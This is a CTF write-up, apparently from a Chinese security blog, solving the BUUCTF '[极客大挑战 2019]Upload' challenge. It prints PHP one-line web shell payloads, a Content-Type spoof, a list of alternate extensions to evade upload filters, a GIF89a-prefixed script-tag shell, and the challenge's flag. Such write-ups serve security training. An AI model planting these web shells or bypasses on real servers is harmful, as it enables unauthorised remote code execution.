[极客大挑战 2019]Upload – buu刷题笔记

[极客大挑战 2019]Upload

题目打开是一个文件上次功能点

图片[1]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地

首次常规操作二话不说先上传一个一句话木马。

<?php @eval($_POST[‘123’])?>

页面提示被拦截,并显示not image

图片[2]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地

那我们进行抓包修改Content-Type字段进行绕过

图片[3]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地

图片[4]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地

发现php后缀被拦截,所以我们用畸形的后缀在进行绕过。

phtml、pht、php、php3、php4、php5

发现phtml可以正常绕过

图片[5]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地

 

图片[6]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地发现<?被检测出来,进行拦截了,所以我们需要替换我们的一句话木马。

GIF89a? <script language=”php”>eval($_REQUEST[123])</script>  #替换之后的木马

然后就上次成功了

图片[7]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地

访问upload目录

http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/

图片[8]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地

然后用菜刀、蚁剑链接,链接地址

http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/shell.phtml

在根目录下找到flag

图片[9]-[极客大挑战 2019]Upload – buu刷题笔记-安全小天地

所以最终flag为flag{2d874116-e982-4f6f-98e5-ceb687be2da1}

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称常用语 夸夸
夸夸
还有吗!没看够!
表情图片

    暂无评论内容